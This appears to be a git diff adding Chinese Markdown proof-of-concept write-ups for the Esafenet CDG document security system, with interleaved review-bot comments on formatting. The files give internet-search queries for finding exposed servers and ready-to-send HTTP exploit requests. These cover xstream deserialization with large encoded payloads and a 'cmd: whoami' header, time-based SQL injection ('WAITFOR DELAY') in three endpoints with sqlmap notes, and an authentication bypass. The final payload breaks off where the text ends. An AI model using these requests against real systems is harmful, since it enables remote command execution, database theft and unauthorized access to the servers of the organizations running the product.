+![1703403921443-a5593b7f-a810-4dc7-9a4c-8bbec44133a5.png](./img/Uxwzn6Zr9xGruQMB/1703403921443-a5593b7f-a810-4dc7-9a4c-8bbec44133a5-460992.png) + + + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tzche7fhknw2h20w> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..11d1339 
--- /dev/null +++ b/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统GetValidateServerService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统GetValidateServerService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/GYPuv2aIcHAg1WeP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-723196.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/GetValidateServerService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKB
PBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706605985910-7cc6e8b3-7fef-4af6-867e-71f9a595d901.png](./img/GYPuv2aIcHAg1WeP/1706605985910-7cc6e8b3-7fef-4af6-867e-71f9a595d901-569610.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bzpz80r8mmev2733> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md new file mode 100644 index 0000000..50c9f25 --- /dev/null 
+++ b/亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞.md 
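Review bot: the request body in the 漏洞复现 block of the GetValidateServerService file is an opaque encoded blob (`Content-Length: 14756`) with nothing in the hunk saying how it is encoded or where it comes from, so the write-up cannot be audited or reproduced from the text; state the encoding and its source, or keep only the request line and headers with a short placeholder for the body. Two smaller points: `Host: 192.168.110.187:8090` is a literal lab address where the other files use `xx.xx.xx.xx` or `{hostname}` placeholders, and the non-standard `cmd: whoami` request header together with a `text/xml` POST to `/CDGServer3/GetValidateServerService` is the most useful detection signal in this hunk and deserves a sentence for defenders.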
@@ -0,0 +1,54 @@ +# 亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统HookInvalidCourse存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/7gxekhf2pSLNh1iS/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-152117.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +command=DelHookInvalidCourse&id=1';WAITFOR DELAY '0:0:3'-- +``` + +![1700640331102-534fff64-497a-4026-b8e7-f9d06ccf3ec5.png](./img/7gxekhf2pSLNh1iS/1700640331102-534fff64-497a-4026-b8e7-f9d06ccf3ec5-709855.png) + +sqlmap + +```plain +POST /CDGServer3/system/HookInvalidCourse;loginService HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +command=DelHookInvalidCourse&id=1 +``` + +注意:不能使用`--batch`参数,因响应为`404`,`sqlamp` + +```plain +[CRITICAL] page not found (404) +it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? 
[Y/n] n +``` + +![1700640609001-6b08c95b-d829-4fed-9d7d-2228ef7ac450.png](./img/7gxekhf2pSLNh1iS/1700640609001-6b08c95b-d829-4fed-9d7d-2228ef7ac450-411173.png) + + + +![1700640620447-993fc465-1bf0-4c9a-8198-449f65c79dfd.png](./img/7gxekhf2pSLNh1iS/1700640620447-993fc465-1bf0-4c9a-8198-449f65c79dfd-484765.png) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uw9gw8vdvw99v8i3> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md b/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md new file mode 100644 index 0000000..3ed4a29 --- /dev/null +++ b/亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞.md 
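Review bot: the sentence after the second sqlmap request in the HookInvalidCourse file is cut off and has a typo: "因响应为`404`,`sqlamp`" should read `sqlmap` and finish the thought (it stops at the `page not found (404)` prompt shown right below, which is why `--batch` must not be used and `n` has to be entered by hand). The `影响版本` section also lists only the product name with no version or build range, so a reader cannot tell whether a given deployment is affected; add the range or mark it as unverified.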
@@ -0,0 +1,45 @@ +# 亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统LinkFilterService存在身份认证绕过漏洞,攻击者可通过该漏洞绕过身份认证进入系统后台。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/9fnUX648F-CLwGAI/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-472735.png) + +# 四、漏洞复现 +```java +POST /CDGServer3/LinkFilterService HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=BCC78770D02EC6AB78EA995E2555A2C1; JSESSIONID=C64DC678312F69EFCDADCC742CF861BB +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 98 + +path=BOFGGPFBFIFPBHFMGKGI&userId=GCGHGAGGFAFHFGFCFEFPFD&cur=DBNJOADCFBOPECMNBCOHMDMDKGCMMLFFCJCACB +``` + +![1702917036931-32f2efde-09b3-4af7-b1ff-2496b8443173.png](./img/9fnUX648F-CLwGAI/1702917036931-32f2efde-09b3-4af7-b1ff-2496b8443173-251671.png) + +![1702916915310-737010ff-3342-4e2e-b45d-4a3bf6b28598.png](./img/9fnUX648F-CLwGAI/1702916915310-737010ff-3342-4e2e-b45d-4a3bf6b28598-758130.png) + +![1702916934484-4afe6db6-a57e-4e26-8eda-0f096164b942.png](./img/9fnUX648F-CLwGAI/1702916934484-4afe6db6-a57e-4e26-8eda-0f096164b942-539350.png) + +nuclei脚本 + +[亿赛通电子文档安全管理系统-linkfilterservice-逻辑漏洞.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621694642-61db836c-1106-4792-8570-cba42f27bd2a.yaml) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: 
<https://www.yuque.com/xiaokp7/ocvun2/xdgbwbrsy3d7v4i8> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md new file mode 100644 index 0000000..c916aa5 --- /dev/null +++ b/亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞.md @@ -0,0 +1,24 @@ +# 亿赛通电子文档安全管理系统LogDownLoadService存在SQL注入漏洞 + +## fofa + +```yaml +body="/CDGServer3/index.jsp" +``` + +## poc + +```java +POST /CDGServer3/logManagement/LogDownLoadService HTTP/1.1 +Host: +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Content-Length: 0 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +X-Requested-With: XMLHttpRequest + +command=downLoadLogFiles&currPage=1&fromurl=../user/dataSearch.jsp&logFileName=indsex.txt&id=-1';WAITFOR DELAY '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..fda9b9d --- /dev/null +++ b/亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 亿赛通电子文档安全管理系统LogicGroupAjax存在SQL注入漏洞 + +亿某通电子文档安全管理系统` LogicGroupAjax`接口的`logicGroupName`参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限 + +## fofa + +```yaml +app="亿赛通-电子文档安全管理系统" +``` + +## poc + +```javascript +POST /CDGServer3/js/../LogicGroupAjax HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +command=isExist&logicGroupName=-1'waitfor delay '0:0:5'-- +``` + diff --git a/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..b129961 --- /dev/null +++ b/亿赛通电子文档安全管理系统MailApp存在xstream反序列化漏洞.md 
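Review bot: in the LinkFilterService file the 漏洞复现 block is an HTTP request but is fenced with the `java` language tag, unlike the `plain` fences used in the other files; the `Cookie` header also carries two `JSESSIONID` values, which leaves it unclear whether the bypass depends on any session at all, so either drop the cookie or say it is irrelevant. The `path`, `userId` and `cur` values are opaque encoded strings with no note on what they encode, so the claim cannot be verified from the text; a sentence on the encoding, or a pointer to the linked nuclei template for that detail, would fix it.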
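Review bot: in the LogDownLoadService file, `Content-Length: 0` contradicts the form body on the last line of the request (a server would ignore that body entirely) and `Host:` is empty where the other files use a placeholder; fix both so the request in the hunk is the one actually sent. The file is also missing the `漏洞简介` / `影响版本` / `资产测绘` sections every other file in this commit has, and the fofa query is fenced as `yaml` and the request as `java`; use `plain` for consistency.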
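Review bot: in the LogicGroupAjax file, `亿某通` in the description contradicts the file name and heading (`亿赛通`); pick one. The request path `/CDGServer3/js/../LogicGroupAjax` carries a `js/../` segment that the text never explains, and that is relevant both to the fix and to detection, so say why it is there. `影响版本` is missing, and the request is fenced with the `javascript` tag rather than `plain`.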
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统MailApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统MailApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/y8FWroxGA2nCEQ2w/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-294627.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/MailApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFL
MFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOB
POBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAM
